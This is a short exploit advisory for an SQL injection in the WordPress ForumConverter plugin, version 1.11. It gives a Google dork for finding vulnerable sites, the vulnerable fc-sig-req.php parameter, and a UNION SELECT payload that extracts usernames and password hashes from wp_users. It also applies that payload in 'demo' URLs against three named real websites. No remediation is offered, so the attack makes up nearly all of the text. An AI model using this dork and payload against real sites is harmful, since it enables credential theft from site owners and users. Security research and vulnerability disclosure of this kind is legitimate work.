Wordpress plugins ForumConverter SQLi Vulnerability

##########################################
# Exploit Title: Wordpress plugins ForumConverter SQL Injection Vulnerability
# Date: 2013-02-01
# Author: DaOne aka Mocking Bird
# Software Link: http://wordpress.org/extend/plugins/forumconverter/
# Category: webapps/php
# Version: 1.11
# Google dork: inurl:"/wp-content/plugins/forumconverter/"
##########################################

-Exploit-
http://localhost/wp-content/plugins/forumconverter/fc-sig-req.php?pid=1{SQLi}

-Demo-
http://charizmatic.com/celia/wp-content/plugins/forumconverter/fc-sig-req.php?pid=1 union select concat(user_login,0x3a,user_pass) from wp_users--
http://fenway.net/wordpress/wp-content/plugins/forumconverter/fc-sig-req.php?pid=1 union select concat(user_login,0x3a,user_pass) from wp_users--
http://www.politicsworldwide.com/wp-content/plugins/forumconverter/fc-sig-req.php?pid=1 union select concat(user_login,0x3a,user_pass) from wp_users--


Greets to: Yassen Elgwell :v



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information